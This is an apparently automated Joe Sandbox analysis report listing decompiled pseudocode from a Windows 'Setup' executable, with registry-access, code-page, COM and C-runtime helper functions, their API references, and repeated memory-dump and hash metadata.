                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                              • Opcode ID: da7658d9d66157049bda50bbad2381ad61c0328b49598051536313ee3ed6bc67
                                                                                                                                                              • Instruction ID: f1e750a2e26c41efd03ff71885b0f68c48a1e76b5339024fafdb6696c1735a02
                                                                                                                                                              • Opcode Fuzzy Hash: da7658d9d66157049bda50bbad2381ad61c0328b49598051536313ee3ed6bc67
                                                                                                                                                              • Instruction Fuzzy Hash: 1B11D0B5A00209EFCB04CF98D994AEFBBB8FB48300F108559E915A7340D734AA51CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00424630 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00424630(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				int _t10;

				_push(__ecx);
				_v8 = __ecx;
				if((E00404630(__ecx, _a4) & 0x000000ff) != 0) {
					_t10 = IsValidCodePage(E00423990(_v8, _a4)); // executed
					if(_t10 != 0) {
						if(E004244C0(E00423900(_v8, _a4) & 0x000000ff) != 0) {
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}





                                                                                                                                                              0x00424633
                                                                                                                                                              0x00424634
                                                                                                                                                              0x00424648
                                                                                                                                                              0x0042465b
                                                                                                                                                              0x00424663
                                                                                                                                                              0x00424683
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424689
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424685
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424665
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?), ref: 0042465B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CodePageValid
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1911128615-0
                                                                                                                                                              • Opcode ID: c9f08de8c4f879767d6e2a12e85733756157903cfeeece9dab4b5c17de24084a
                                                                                                                                                              • Instruction ID: acd3b80e2f9a2ac0ace554b376bf7bf21ec0217d72e302f345e402b3ba2f3122
                                                                                                                                                              • Opcode Fuzzy Hash: c9f08de8c4f879767d6e2a12e85733756157903cfeeece9dab4b5c17de24084a
                                                                                                                                                              • Instruction Fuzzy Hash: 0EF09CF4700124778E04DF51F8459BB339C9E92309750415AF80687201D53DDA1966A9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041EEA0 Relevance: 1.5, APIs: 1, Instructions: 36registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E0041EEA0(intOrPtr* __ecx, void* _a4, short* _a8, int _a12) {
				void* _v8;
				long _v12;
				intOrPtr* _v16;
				long _t19;

				_v16 = __ecx;
				do {
				} while (0 != 0 || 0 != 0);
				_v8 = 0;
				_t19 = RegOpenKeyExW(_a4, _a8, 0, _a12,  &_v8); // executed
				_v12 = _t19;
				if(_v12 == 0) {
					_v12 = E0041EF10(_v16);
					 *_v16 = _v8;
					 *(_v16 + 4) = _a12 & 0x00000300;
				}
				return _v12;
			}







                                                                                                                                                              0x0041eea6
                                                                                                                                                              0x0041eea9
                                                                                                                                                              0x0041eea9
                                                                                                                                                              0x0041eeb1
                                                                                                                                                              0x0041eeca
                                                                                                                                                              0x0041eed0
                                                                                                                                                              0x0041eed7
                                                                                                                                                              0x0041eee1
                                                                                                                                                              0x0041eeea
                                                                                                                                                              0x0041eef8
                                                                                                                                                              0x0041eef8
                                                                                                                                                              0x0041ef01

                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              • Opcode ID: 7933fb232ceb25f8994056af9fbb8c987e53069f7ad553ecf10823e6c5af83cf
                                                                                                                                                              • Instruction ID: e72a7226712429adf47ea8eac5b50b7f1d65c1406d4f5b2af12a8abfb9092063
                                                                                                                                                              • Opcode Fuzzy Hash: 7933fb232ceb25f8994056af9fbb8c987e53069f7ad553ecf10823e6c5af83cf
                                                                                                                                                              • Instruction Fuzzy Hash: EC01B679A00208EFCB04DF95D885AEEBBB5EB88300F10C5AAE8159B340D7349A50DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00429BB0 Relevance: 1.5, APIs: 1, Instructions: 35registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00429BB0(void** __ecx, short* _a4, char* _a8) {
				int _v8;
				int _v12;
				long _v16;
				void** _v20;
				long _t15;

				_v20 = __ecx;
				do {
				} while (0 != 0 || 0 != 0);
				_v12 = 4;
				_t15 = RegQueryValueExW( *_v20, _a4, 0,  &_v8, _a8,  &_v12); // executed
				_v16 = _t15;
				if(_v16 == 0) {
					if(_v8 == 4) {
						return 0;
					}
					return 0xd;
				}
				return _v16;
			}








                                                                                                                                                              0x00429bb6
                                                                                                                                                              0x00429bb9
                                                                                                                                                              0x00429bb9
                                                                                                                                                              0x00429bc1
                                                                                                                                                              0x00429be0
                                                                                                                                                              0x00429be6
                                                                                                                                                              0x00429bed
                                                                                                                                                              0x00429bf8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00429c01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00429bfa
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExW.KERNEL32(DDD124F9,00000004,00000000,DDD124F9,?,00000004,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System), ref: 00429BE0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                              • Opcode ID: 1a4580bf5f4484c55dbb0b26d34549cd485e0b3af099ee7def2407f50086bd3c
                                                                                                                                                              • Instruction ID: f7dae3d87c89e33c9cd46dbbadd7aec66fcca4881972f95749d9c857ab391f74
                                                                                                                                                              • Opcode Fuzzy Hash: 1a4580bf5f4484c55dbb0b26d34549cd485e0b3af099ee7def2407f50086bd3c
                                                                                                                                                              • Instruction Fuzzy Hash: 35F04971A00218EBDB04DF99E848BAFB7B4BB48304F40859AE91197390E378AE04CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00433D20 Relevance: 1.5, APIs: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00433D20(signed int _a4) {
				char _v16;
				void* __ebp;
				signed int _t12;
				void* _t15;
				void* _t19;
				void* _t25;

				if(_a4 > 0) {
					__eflags = (_t12 | 0xffffffff) / _a4 - 0x34;
					if(__eflags < 0) {
						E00417B30(0);
						E00456A4C( &_v16, 0x544b88);
					}
				} else {
					_a4 = 0;
				}
				_t15 = E0044F76F(_t19, _t25, _a4 * 0x34, _a4 * 0x34); // executed
				return _t15;
			}









                                                                                                                                                              0x00433d2a
                                                                                                                                                              0x00433d3d
                                                                                                                                                              0x00433d40
                                                                                                                                                              0x00433d47
                                                                                                                                                              0x00433d55
                                                                                                                                                              0x00433d55
                                                                                                                                                              0x00433d2c
                                                                                                                                                              0x00433d2c
                                                                                                                                                              0x00433d2c
                                                                                                                                                              0x00433d61
                                                                                                                                                              0x00433d6c

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00433D55
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2005118841-0
                                                                                                                                                              • Opcode ID: e2dc7320d69519031074de49e6258e1b0fa84e3aa3c6c9dc91975f3d0eb220b7
                                                                                                                                                              • Instruction ID: e43e9bdc0413b454325974aea46165c8a24d2e5647b2e6daf7de51821789c90a
                                                                                                                                                              • Opcode Fuzzy Hash: e2dc7320d69519031074de49e6258e1b0fa84e3aa3c6c9dc91975f3d0eb220b7
                                                                                                                                                              • Instruction Fuzzy Hash: 2FE02B7090010866EF04EF60C84279D3B29AB10369F00863BFC0B5A0C1DB38EB8986CD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041EF10 Relevance: 1.5, APIs: 1, Instructions: 21registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0041EF10(void** __ecx) {
				void* _v8;
				void** _v12;
				long _t12;

				_v12 = __ecx;
				_v8 = 0;
				if( *_v12 != 0) {
					_t12 = RegCloseKey( *_v12); // executed
					_v8 = _t12;
					 *_v12 = 0;
				}
				_v12[1] = 0;
				return _v8;
			}






                                                                                                                                                              0x0041ef16
                                                                                                                                                              0x0041ef19
                                                                                                                                                              0x0041ef26
                                                                                                                                                              0x0041ef2e
                                                                                                                                                              0x0041ef34
                                                                                                                                                              0x0041ef3a
                                                                                                                                                              0x0041ef3a
                                                                                                                                                              0x0041ef43
                                                                                                                                                              0x0041ef50

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 91ea06a02c1e2abaa4150cc088f806866b2a54e11f8803adc4cfb31c19173421
                                                                                                                                                              • Instruction ID: 820672166823583b4fef396b48c4dbdbd765742b514186620d846768b76c89e1
                                                                                                                                                              • Opcode Fuzzy Hash: 91ea06a02c1e2abaa4150cc088f806866b2a54e11f8803adc4cfb31c19173421
                                                                                                                                                              • Instruction Fuzzy Hash: ADF0E578900308EFDB00CF98D594B9EBFB4EB49304F1080D9E804AB390C776AE85DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00443050 Relevance: 1.5, APIs: 1, Instructions: 17comCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(000000FF,00000000,000000FF,0053D3B4,DDD124F9,?,?,00490443,0051BAFC,00000000,00000017,00000000,00000000,000000FF,00000000,000000FF), ref: 0044306C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                              • Opcode ID: e2591718d38672465c40d119d12b6cfdae1246e638e281d2108abddb0f8c5d8b
                                                                                                                                                              • Instruction ID: d7e829fc0369689cf003dd1b57fd33423f6668e70923e4d6f68ba6fba734b568
                                                                                                                                                              • Opcode Fuzzy Hash: e2591718d38672465c40d119d12b6cfdae1246e638e281d2108abddb0f8c5d8b
                                                                                                                                                              • Instruction Fuzzy Hash: 2AD067B660420CBB8B04CFD9EC45CAEB7BCEB5C750B108549B90887300D631AE109BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00422F50 Relevance: 1.5, APIs: 1, Instructions: 17registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegDeleteValueW.KERNEL32(00000000,?), ref: 00422F69
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DeleteValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1108222502-0
                                                                                                                                                              • Opcode ID: 623dbd52a23a3001517e907731fa794683d2616bae9e7e4ea07a56ac7a586e52
                                                                                                                                                              • Instruction ID: 466e9685c4020b865daf75248f732fbf60c7d645a2e0b63f6194d1e79d89bd0b
                                                                                                                                                              • Opcode Fuzzy Hash: 623dbd52a23a3001517e907731fa794683d2616bae9e7e4ea07a56ac7a586e52
                                                                                                                                                              • Instruction Fuzzy Hash: E7D0A77170420DBB8B28CF95EA44CABB7B8EB5D340740816EF80DC7310E631AD20E69C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0044FAA9 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0044FAA9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t9;
				void* _t18;

				_push(0xc);
				_push(0x544118);
				E00456860(__ebx, __edi, __esi);
				E004579B4();
				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
				_t9 = E0044F9BE(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
				 *(_t18 - 4) = 0xfffffffe;
				E0044FADF();
				return E004568A5( *((intOrPtr*)(_t18 - 0x1c)));
			}





                                                                                                                                                              0x0044faa9
                                                                                                                                                              0x0044faab
                                                                                                                                                              0x0044fab0
                                                                                                                                                              0x0044fab5
                                                                                                                                                              0x0044faba
                                                                                                                                                              0x0044fac1
                                                                                                                                                              0x0044fac7
                                                                                                                                                              0x0044faca
                                                                                                                                                              0x0044fad1
                                                                                                                                                              0x0044fade

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004579B4: __lock.LIBCMT ref: 004579B6
                                                                                                                                                              • __onexit_nolock.LIBCMT ref: 0044FAC1
                                                                                                                                                                • Part of subcall function 0044F9BE: __decode_pointer.LIBCMT ref: 0044F9CD
                                                                                                                                                                • Part of subcall function 0044F9BE: __decode_pointer.LIBCMT ref: 0044F9DD
                                                                                                                                                                • Part of subcall function 0044F9BE: __msize.LIBCMT ref: 0044F9FB
                                                                                                                                                                • Part of subcall function 0044F9BE: __realloc_crt.LIBCMT ref: 0044FA1F
                                                                                                                                                                • Part of subcall function 0044F9BE: __realloc_crt.LIBCMT ref: 0044FA35
                                                                                                                                                                • Part of subcall function 0044F9BE: __encode_pointer.LIBCMT ref: 0044FA47
                                                                                                                                                                • Part of subcall function 0044F9BE: __encode_pointer.LIBCMT ref: 0044FA55
                                                                                                                                                                • Part of subcall function 0044F9BE: __encode_pointer.LIBCMT ref: 0044FA60
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1316407801-0
                                                                                                                                                              • Opcode ID: 03bfc8f837780bf28ef7ca825567f3edbeaad42c8c69f643a1cb87bab58b4b47
                                                                                                                                                              • Instruction ID: 0060cbbf07bae28ecfac1589c5c3401a5b99e779319e2f9ba1ee8d50a06e8e19
                                                                                                                                                              • Opcode Fuzzy Hash: 03bfc8f837780bf28ef7ca825567f3edbeaad42c8c69f643a1cb87bab58b4b47
                                                                                                                                                              • Instruction Fuzzy Hash: D3D05B71C41209E6EF00BBA6D90275D76717F00319F50416EB414671D3C77C09499A59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00454D7B Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00454D7B(intOrPtr _a4, intOrPtr _a8) {
				signed int _t3;
				void* _t7;
				void* _t8;

				_t3 = E00454CF2(_t7, _t8, _a4, _a8); // executed
				asm("sbb eax, eax");
				return  ~_t3;
			}






                                                                                                                                                              0x00454d86
                                                                                                                                                              0x00454d8f
                                                                                                                                                              0x00454d92

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __waccess_s
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4272103461-0
                                                                                                                                                              • Opcode ID: 121c4f77d4c72d3789264fc0d0d617dc9724d87233f222cead199be475d85574
                                                                                                                                                              • Instruction ID: c01e5d1af73e778fe685e865bf1456fca0106d4cf4c4f886beebd409df1a495b
                                                                                                                                                              • Opcode Fuzzy Hash: 121c4f77d4c72d3789264fc0d0d617dc9724d87233f222cead199be475d85574
                                                                                                                                                              • Instruction Fuzzy Hash: BBC02B3300400C3F4F091DEAEC00C043F09C6C0334710C116FD0D8C091CD33D4508140
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004BF540 Relevance: 1.5, APIs: 1, Instructions: 5COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004BF540() {
				void* _t1;

				_t1 = E004AD770(); // executed
				return _t1;
			}




                                                                                                                                                              0x004bf543
                                                                                                                                                              0x004bf549

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
